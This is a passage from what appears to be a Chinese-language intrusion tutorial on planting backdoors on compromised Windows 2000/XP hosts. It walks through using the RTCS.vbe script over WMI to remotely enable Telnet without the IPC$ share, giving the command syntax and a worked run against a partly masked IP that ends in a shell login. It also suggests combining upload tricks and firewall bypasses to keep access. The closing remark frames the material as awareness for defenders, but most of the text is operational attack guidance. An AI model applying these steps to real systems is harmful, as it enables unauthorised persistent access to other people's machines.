三、后门的架设：

    为了获得远程主机更长时间的控制权，我们需要放置一些后门程序，前面已经有所涉及相信大家也多少有所了解了。但是当没有开启人和共享的时候你要如何放置你的后门程序呢？

    大家可能认为，Windows很多服务是基于IPC$的，所以只要关闭该共享，即使得到admin的权限也不会有何作为的，毕竟“没有共享就不能放置后门”。

    但是事实并非如此，现在有很多机遇WMI服务的宿主脚本程序，既简单的解决了这样的问题，当然也产生了不少安全的隐患。现在据我所知，有两个vbe的脚本分别可以实现开启远程主机Telnet和Terminal Services的功能。我这里只介绍一下开启Telnet服务的宿主脚本的使用：

    这里使用的RTCS.vbe是用来远程开启/关闭目标telnet服务的windows脚本。
    特点：不依赖于ipc$开放与否。 
    原理：直接访问目标的windows管理规范服务（WMI），该服务为系统重要服务，默认启动。
    支持平台：Windows 2000 Professional， Windows 2000 server ，Windows XP
    使用方法：
    在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如

    c:\>cscript. RTCS.vbe <目标IP> <用户名> <密码> 验证方式> >

    其中 NTLM 值可取0，1，2：
    0: 不使用 NTLM 身份验证； 
    1: 先尝试 NTLM 身份验证。如果失败，再使用用户名和密码；
    2: 只使用 NTLM 身份验证。
    空密码用两个双引号""表示。

    脚本自动检查目标telnet服务情况，如果未启动则启动它，相反就关闭。
    同一个命令执行两遍，就开/关一次服务。
    关闭服务时也必须输入共5个参数，这样可以根据需要还原服务设置为默认值（NTLM=2,端口23） 
    如果telnet服务被禁用，将自动更改为“手动”。

    C:\>cscript. rtcs.vbe 202.***.***.*** tsinternetuser ************* 0 23

    Microsoft (R) Windows Script. Host Version 5.6
    版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。

    ************************************************************************
    RTCS v1.08
    Remote Telnet Configure Script, by zzzevazzz 
    Welcome to visite www.isgrey.com
    Usage:
    cscript. C:\rtcs.vbe targetIP username password NTLMAuthor telnetport
    It will auto change state of target telnet server. ************************************************************************

    Conneting 202.***.***.***....
    OK!
    Setting NTLM=0....
    OK!
    Setting port=23....
    OK!
    Querying state of telnet server....
    Changeing state....
    OK! 
    Target telnet server has been START Successfully!
    Now, you can try: telnet 202.***.***.*** 23, to get a shell.

    C:\>telnet 202.***.***.***

    Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
    Welcome to Microsoft Telnet Service
    Telnet Server Build 5.00.99201.1
    login:tsinternetuser
    password:*********

    *===============================================================
    欢迎使用 Microsoft Telnet 服务器。 
    *===============================================================
    C:\>

    成功！ 服务端口

    还有一个脚本就是ROTS.vbe是用来开启Terminal services的，我一直没有成功过，所以也不好向大家介绍。

    开设后门需要开动脑筋，结合所有自己的技能来实现。比如使用先前提到的上传下载的方式都是可以进行综合利用的，这就要看自己的了……比如突破防火墙里面提到的，我认为也因该算是架设后门的好办法。

    上面的三个方面我认为是不可分的，我分开他们是很困难的……所以这篇文章才想了这么久

    后记：

    今天有人说，写这篇文章绝对有毛病，都得到Shell了，还要这么麻烦……还有人说，这些防范手段有什么用，人家都已经进来了…… 其实，得到了Shell还有许多事情要做，要看看这个Shell可以做什么，尽量避免入侵者得到Shell之后的破坏行为……的发生，没办法，第一道防线已经崩溃，就只好留一手来补救一下了。